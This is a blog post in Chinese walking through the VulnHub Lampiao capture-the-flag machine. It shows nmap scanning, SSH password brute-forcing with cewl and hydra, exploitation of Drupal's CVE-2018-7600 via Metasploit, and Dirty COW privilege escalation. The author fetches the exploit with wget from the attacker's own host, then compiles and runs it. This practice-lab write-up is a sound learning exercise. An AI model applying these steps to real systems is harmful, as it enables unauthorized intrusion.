VulnHub-Lampiao-学习记录

又是一个周末,很长时间没更新了,摸下靶机记录一下

1.信息收集

开启nmap扫描一下获取目标IP
在这里插入图片描述
接着扫目标IP
在这里插入图片描述
发现开启了三个端口22,80,1898
尝试对22端口进行ssh弱口令爆破无果,再访问80端口看看
在这里插入图片描述
一个静态页面,通过各种工具扫描之后也是没有头绪,还剩一个1898端口
在这里插入图片描述
除了一个登录框还要俩页面
在这里插入图片描述
在这里插入图片描述
天真的我对登录框尝试了弱口令,无果之后陷入了僵局,直到发现url栏里这俩页面一个node/1,一个node/3说明应该还存在一个2,修改成2访问看看
在这里插入图片描述
看到了点有用的信息,逐个访问看看
在这里插入图片描述
额,略微尴尬,新机子啥也没装,瞧一眼其它师傅写的文章这里是啥
是一段语音,语音内容为:user tiago,则用户名为:tiago
在这里插入图片描述
一个二维码,扫了一下出现了一句英文:Try harder!Muahuahua
无用,尝试对网站进行扫描,御剑或者其它工具,这里我就用跟其它师傅一样的dirb吧
在这里插入图片描述
在这里插入图片描述
发现一个robots.txt的文件,访问看看
在这里插入图片描述
在此文件中找到了网站信息
在这里插入图片描述
是个Drupal 7的CMS
到这里之后我首先想到的就是找历史漏洞看看能不能通过MSF打一下,看了一篇文章之后发现再这之前还有一步连接ssh,历史漏洞用来进行提权
首先使用cewl结合网站特性生成社工字典,随后用hydra进行爆破
在这里插入图片描述
成功爆破出了密码
使用账户密码连接ssh
在这里插入图片描述
成功连接,先尝试看看能不能sudo su提权到root,失败了…

2.提权

这里还是不太熟悉,参考着师傅们的文章打的
还记得之前找到的Drupal 7的CMS,网上找到了CVE-2018-7600的漏洞,掏出大宝贝MSF
在这里插入图片描述
在这里插入图片描述
show option查看渗透信息,需要填写Rhosts攻击IP,Rport攻击端口
在这里插入图片描述
设置完之后运行成功
在这里插入图片描述
现在是成功利用该CVE漏洞进入系统,应该是个跟之前ssh一样的低权限用户
转入tty

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

后面通过文章学习需要利用脏牛提权(dirty),本地查找一下
在这里插入图片描述
在这里插入图片描述
接着将其复制到本地,开启本地python服务,然后把40847.cpp发送到靶机上

python -m SimpleHTTPServer 5555 
开启服务

在这里插入图片描述
接下来将40847.cpp传到靶机上

wget http://192.168.149.128:5555/40847.cpp

在这里插入图片描述
执行gcc编译可执行文件,可直接提权

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告

2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告

3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高

4. -std=c++11就是用按C++2011标准来编译的

5. -pthread 在Linux中要用到多线程时,需要链接pthread库

6. -o dcow gcc生成的目标文件,名字为dcow

在这里插入图片描述
在这里插入图片描述
提权成功拿到了root的密码
接下来使用root账户登录ssh
在这里插入图片描述
成功登录,查看一下目录
在这里插入图片描述
直接获取flag
在这里插入图片描述
这一次的渗透学习比刚开始好很多,没有特别的手足无措…唔~
在这里插入图片描述

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值